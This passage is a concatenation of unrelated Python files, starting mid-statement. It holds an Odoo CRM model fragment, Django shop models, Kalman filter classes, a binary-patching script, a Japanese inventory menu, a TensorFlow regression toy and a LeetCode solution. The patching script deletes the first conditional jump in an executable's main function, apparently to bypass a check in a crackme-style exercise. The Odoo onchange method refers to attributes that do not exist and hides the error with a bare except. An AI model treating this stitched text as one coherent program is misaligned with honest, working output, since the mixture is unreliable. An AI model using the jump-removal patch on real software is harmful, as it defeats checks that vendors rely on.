'/'}) return return_check custom_company=fields.Many2one(comodel_name='res.company',string="Company",required=True,default=_get_custom_company_default) partner_name = fields.Char(compute='_get_partner_details',string="Company Name") partner_id = fields.Many2one('res.partner', 'Partner',track_visibility='onchange', select=True) name = fields.Char(string='Subject', select=1) email_from = fields.Char(compute='_get_partner_details',string='Email', size=128, help="Email address of the contact", select=1) creation_date = fields.Date('Creation Date',required=True,readonly=False) description = fields.Text('Internal Notes') contact_name = fields.Char(compute='_get_partner_details',string='Contact Name', size=64) priority = fields.Selection(selection=[('0', 'Very Low'),('1', 'Low'),('2', 'Normal'),('3', 'High'),('4', 'Very High')], string='Priority', select=True,default='2') user_id = fields.Many2one('hr.employee', 'Salesperson', select=True, track_visibility='onchange') product_line = fields.One2many('panipat.crm.product','crm_lead_id',string="Products",copy=True) employee_line = fields.One2many('panipat.employee.schedule','crm_lead_id',string="Employees for Measurement",copy=True) street = fields.Char(compute='_get_partner_details',string='Street') street2 = fields.Char(compute='_get_partner_details',string='Street2') zip = fields.Char(compute='_get_partner_details',string='Zip', change_default=True, size=24) city = fields.Char(compute='_get_partner_details',string='City') state_id = fields.Many2one(compute='_get_partner_details',comodel_name="res.country.state", string='State') country_id = fields.Many2one(compute='_get_partner_details',comodel_name='res.country', string='Country') phone = fields.Char(compute='_get_partner_details',string='Phone') fax = fields.Char(compute='_get_partner_details',string='Fax') mobile = fields.Char(compute='_get_partner_details',string='Mobile') title = fields.Many2one(compute='_get_partner_details',comodel_name='res.partner.title', string='Title') sequence = fields.Char(string="Order No.",copy=False,default='draft') state = fields.Selection(string="State",selection=[('draft','Draft'),('confirm','Confirm'),('quotation','Quotation'),('install','Install'),('cancel','Cancel')],copy=False,default='draft') total_paid_amount =fields.Float(compute='_get_amount_paid',string="Payment",default=00.00) order_group =fields.Many2one('panipat.order.group',string="Order Group",readonly=True,copy=False) sale_order=fields.Many2one(comodel_name="sale.order", string='Quotation',copy=False,readonly=True) install_id=fields.Many2one(comodel_name='panipat.install', string='Install Id',copy=False,readonly=True) client_order_ref=fields.Char('Buyer Order No./Ref', copy=False) class panipat_crm_product(models.Model): _name = "panipat.crm.product" product_id = fields.Many2one('product.product',string="product") crm_lead_id = fields.Many2one('panipat.crm.lead') description = fields.Text(string="Description",required=True) hsn_code=fields.Many2one("hsn.code",string="HSN Code") sequence = fields.Integer(default=10) product_uom_qty=fields.Float(string="Qty",digits_compute= dp.get_precision('Product UoS')) product_uom=fields.Many2one(comodel_name='product.uom', string='Unit') sale_price = fields.Float('Unit Sale Price', digits_compute= dp.get_precision('Product Price')) _order='sequence' @api.onchange("product_id") def _onchange_product_id(self): description = self.product_id and self.product_id.name_get()[0][1] or "" #print "------description=====",description self.description = description self.product_uom=self.product_id.uom_id.id try: pricelist=self.pool.get('res.partner').default_get(self._cr, self._uid, ['property_product_pricelist'], context=self._context)['property_product_pricelist'] abc=self.pool.get('sale.order.line').product_id_change(self._cr,self._uid,[],pricelist,self.product_service_id.id,partner_id=self.install_service_id.customer.id,context=self._context) #print "-=-=-abc-==-=",abc self.sale_price=abc['value']['price_unit'] except: self.sale_price=self.product_id.lst_price
from django.db import models from django.utils.safestring import mark_safe from image_cropping import ImageRatioField from easy_thumbnails.files import get_thumbnailer # Create your models here. class Page(models.Model): title = models.CharField(max_length=250) content = models.TextField() class Category(models.Model): name = models.CharField(max_length=250) def __str__(self): return self.name class Product(models.Model): name = models.CharField(max_length=250) content = models.TextField() category = models.ForeignKey(Category, on_delete=models.CASCADE, default="", blank=True, null=True) image = models.ImageField(upload_to="") cropping = ImageRatioField('image', '430x360') @property def image_tag(self): return mark_safe("<img src= '%s' />" % self.image.url) def __str__(self): return self.name class Busket(models.Model): name = models.CharField(max_length=100) number = models.TextField(max_length=100) product = models.ForeignKey(Product, on_delete=models.CASCADE, default="", blank=True, null=True) def __str__(self): return self.name
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Kalman filter implementation. 1. Bicycle model 2. Unicycle model """ import numpy as np import math class Filter(object): def __init__(self, debug=False): self.debug = debug self._X = None self._P = None self._Q = None self._R = None def set_init_state(self, init_state): self._X = init_state def set_init_covariance(self, init_covariance): self._P = init_covariance def set_process_noise(self, noise): self._Q = noise def set_measurement_noise(self, noise): self._R = noise def is_init_state_set(self): return self._X is not None @property def X(self): return self._X @property def P(self): return self._P class LinearKalmanFilter(Filter): """ simple linear Kalman filter. state is [x, y, vel_x, vel_y] measurement is [x, y] """ def __init__(self, debug=False): super(LinearKalmanFilter, self).__init__(debug) self.A = None self.H = np.array([[1, 0, 0, 0], [0, 1, 0, 0]]) # process noise covariance self._Q = np.array([[0.1, 0, 0, 0], [0, 0.1, 0, 0], [0, 0, 0.1, 0], [0, 0, 0, 0.1]]) # measurement noise covariance self._R = np.array([[0.05, 0], [0, 0.05]]) # initial state covariance self._P = np.array([[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]) def predict(self, delta_t): assert (self._X is not None) self.A = np.array([[1, 0, delta_t, 0], [0, 1, 0, delta_t], [0, 0, 1, 0], [0, 0, 0, 1]]) self._X = np.dot(self.A, self._X) self._P = self.A.dot(self._P).dot(self.A.T) + self._Q if self.debug: print("delta_t: {}".format(delta_t)) def correct(self, Z): K = self._P.dot(self.H.T).dot(np.linalg.inv(self.H.dot(self._P).dot(self.H.T) + self._R)) self._X = self._X + K.dot(Z - self.H.dot(self._X)) self._P = (np.identity(4) - K.dot(self.H)).dot(self._P) if self.debug: print("P:\n {}".format(self._P)) print("X:\n {}".format(self._X)) print("K:\n {}".format(K)) class BicycleKalmanFilter(Filter): """ bicyle EKF state is [x, y, yaw, vel, beta], beta is the angle of the current velocity of the center of mass with respect to the longitudinal axis of the car measurement is [x, y] """ def __init__(self, cm2rear_len=2.0, debug=False): super(BicycleKalmanFilter, self).__init__(debug) np.set_printoptions(precision=5) self.debug = debug self.cm2rear_len = cm2rear_len # distance from center of mass to rear wheel self.A = None self.H = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]]) self._X = None # TODO: the non-diagonal element for Q may not be zero self._Q = np.array([[1e-7, 0, 0, 0, 0], [0, 1e-7, 0, 0, 0], [0, 0, 1e-7, 0, 0], [0, 0, 0, 1e-3, 0], [0, 0, 0, 0, 1e-2]]) # self.R = np.array([[0.5, 0], [0, 0.5]]) # self.R = np.array([[5.0, 0], [0, 5.0]]) self._R = np.array([[100.0, 0], [0, 100.0]]) # TODO: the non-diagonal element for P may not be zero self._P = np.array([[10.0, 0, 0, 0, 0], [0, 10.0, 0, 0, 0], [0, 0, 10.0, 0, 0], [0, 0, 0, 10.0, 0], [0, 0, 0, 0, 10.0]]) self.K = None def predict(self, delta_t): assert (self._X is not None) # state update # X[3] and X[4] are vel and beta. both are kept as constant. self._X[0] = self._X[0] + self._X[3] * math.cos(self._X[2] + self._X[4]) * delta_t self._X[1] = self._X[1] + self._X[3] * math.sin(self._X[2] + self._X[4]) * delta_t self._X[2] = self._X[2] + self._X[3] / self.cm2rear_len * math.sin(self._X[4]) * delta_t # compute Jacobian j13 = -delta_t * math.sin(self._X[2] + self._X[4]) * self._X[3] j14 = delta_t * math.cos(self.X[2] + self.X[4]) j15 = -delta_t * math.sin(self.X[2] + self.X[4]) * self.X[3] j23 = delta_t * math.cos(self.X[2] + self.X[4]) * self.X[3] j24 = delta_t * math.sin(self.X[2] + self.X[4]) j25 = delta_t * math.cos(self.X[2] + self.X[4]) * self.X[3] j34 = delta_t * math.sin(self.X[4]) / self.cm2rear_len j35 = delta_t * math.cos(self.X[4]) / self.cm2rear_len * self.X[3] jocobian = np.array([[1, 0, j13, j14, j15], [0, 1, j23, j24, j25], [0, 0, 1, j34, j35], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]]) # covariance update self._P = np.matmul(np.matmul(jocobian, self._P), jocobian.T) + self._Q if self.debug: print("delta_t: {}".format(delta_t)) print("P prior:\n {}".format(self._P)) print("X prior:\n {}".format(self.X)) print('psi prior {} deg'.format(math.degrees(self.X[2]))) print('beta prior {} deg'.format(math.degrees(self.X[4]))) def correct(self, Z): inv_tmp = np.linalg.inv(np.matmul(np.matmul(self.H, self._P), self.H.T) + self._R) self.K = np.matmul(np.matmul(self._P, self.H.T), inv_tmp) self._X = self._X + np.matmul(self.K, Z - np.matmul(self.H, self._X)) self._P = np.matmul(np.identity(5) - np.matmul(self.K, self.H), self._P) if self.debug: print("P:\n {}".format(self._P)) print("X:\n {}".format(self._X)) print("K:\n {}".format(self.K)) print('psi {} deg'.format(math.degrees(self._X[2]))) print('beta {} deg'.format(math.degrees(self._X[4]))) class UnicycleKalmanFilter: """TODO: WIP, still have bugs""" def __init__(self, debug=False): raise NotImplementedError("not implemented yet") self.debug = debug self.A = None self.H = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]]) self.X = np.array([0, 0, 0, 0, 0]).T self.X_prior = None # TODO: the non-diagonal element for Q may not be zero self.Q = np.array( [[0.1, 0, 0, 0, 0], [0, 0.1, 0, 0, 0], [0, 0, 0.1, 0, 0], [0, 0, 0, 0.1, 0], [0, 0, 0, 0, 0.5]]) self.R = np.array([[0.001, 0], [0, 0.001]]) # TODO: the non-diagonal element for P may not be zero self.P = np.array( [[1.0, 0, 0, 0, 0], [0, 1.0, 0, 0, 0], [0, 0, 1.0, 0, 0], [0, 0, 0, 1.0, 0], [0, 0, 0, 0, 1.0]]) self.P_prior = None self.K = None def predict(self, delta_t): self.A = np.array([[1, 0, delta_t * -self.X[3] * math.sin(self.X[2]), delta_t * math.cos(self.X[2]), 0], [0, 1, delta_t * self.X[3] * math.cos(self.X[2]), delta_t * math.sin(self.X[2]), 0], [0, 0, 1, 0, delta_t], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]]) self.X_prior = np.dot(self.A, self.X) self.P_prior = self.A.dot(self.P).dot(self.A.T) + self.Q if self.debug: print("delta_t: {}".format(delta_t)) def correct(self, Z): self.K = self.P_prior.dot(self.H.T).dot(np.linalg.inv(self.H.dot(self.P_prior).dot(self.H.T) + self.R)) self.X = self.X_prior + self.K.dot(Z - self.H.dot(self.X_prior)) self.P = (np.identity(5) - self.K.dot(self.H)).dot(self.P_prior) if self.debug: print("P:\n {}".format(self.P)) print("X:\n {}".format(self.X)) print("K:\n {}".format(self.K))
import os from dispatch import * exe = read_executable('thing') exe.analyze() main = exe.function_named('_main') ins = None for i in main.instructions: if i.mnemonic == 'jne': ins = i break exe.replace_instruction(ins, '') exe.save('patched') os.system("chmod +x patched")
#!/usr/bin/env python3 # -*- coding: utf-8 -*- #TFC輸入カバーのメニュー from tfc_cover import TfcCover tc = TfcCover() menu_line =""" 1)検索コード 2)検索番地 3)ロケーション指示 (output) 4)ロケーション指示 (表示/印刷) 5)更新 6)cover_zaiko.csv 書き出し (在庫報告用) 7)修正データ読み込み(stockフォルダのrevから始まるファイル) 8)保存 9)emptyラック書き出し(data/empty_rack.csv) 10)到着インボイスデータ選択/加工 11)棚卸し用リスト打ち出し(racklist) """ ans = '' while ans != 'q': print(menu_line) ans = input('メニューを選んでください。(q=終了)') if ans == '1': tc.search_code() elif ans == '2': tc.search_banch() elif ans == '3': tc.make_shiji() elif ans == '4': tc.show_shiji() elif ans == '5': tc.make_koshin() elif ans == '6': tc.write_cover_zaiko() elif ans == '7': tc.reload() elif ans == '8': tc.save() elif ans == '9': tc.write_empty() elif ans == '10': tc.write_inv() elif ans == '11': tc.write_rack()
import tensorflow as tf x_data = [[10, 20, 30], [40, 50, 15], [25, 35, 45], [55, 13, 23], [33, 43, 53]] y_data = [[50], [60], [70], [80], [75]] X = tf.placeholder(tf.float32, shape=[None, 3])#None = n, 즉 원하는 만큼 쓸수있음 Y = tf.placeholder(tf.float32, shape=[None, 1]) W = tf.Variable(tf.random_normal([3,1]), name='weight') b = tf.Variable(tf.random_normal([1]), name='bias') hypothesis = tf.matmul(X,W) + b cost = tf.reduce_mean(tf.square(hypothesis - Y)) optimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-5) train = optimizer.minimize(cost) sess = tf.Session() sess.run(tf.global_variables_initializer()) for step in range(2001): cost_val, hy_val, _ = sess.run([cost, hypothesis, train], feed_dict={X:x_data, Y:y_data}) if step%10 == 0: print(step, "cost : ", cost_val, "\nPrediction : \n", hy_val)
""" 39. Combination Sum Medium 2619 Given a set of candidate numbers (candidates) (without duplicates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target. The same repeated number may be chosen from candidates unlimited number of times. Note: All numbers (including target) will be positive integers. The solution set must not contain duplicate combinations. Example 1: Input: candidates = [2,3,6,7], target = 7, A solution set is: [ [7], [2,2,3] ] Example 2: Input: candidates = [2,3,5], target = 8, A solution set is: [ [2,2,2,2], [2,3,3], [3,5] ] = - list concatenate => [1] + [3, 4] => [1, 3, 4] """ class Solution(object): def combinationSum(self, candidates, target): res = [] self.dfs(candidates, target, 0, [], res) return res def dfs(self, nums, target, index, path, res): if target < 0: return if target == 0: res.append(path) return for i in range(index, len(nums)): self.dfs(nums, target - nums[i], i, path + [nums[i]], res) nums, target = [2, 3, 5], 8 s = Solution() test = s.combinationSum(nums, target) print(test)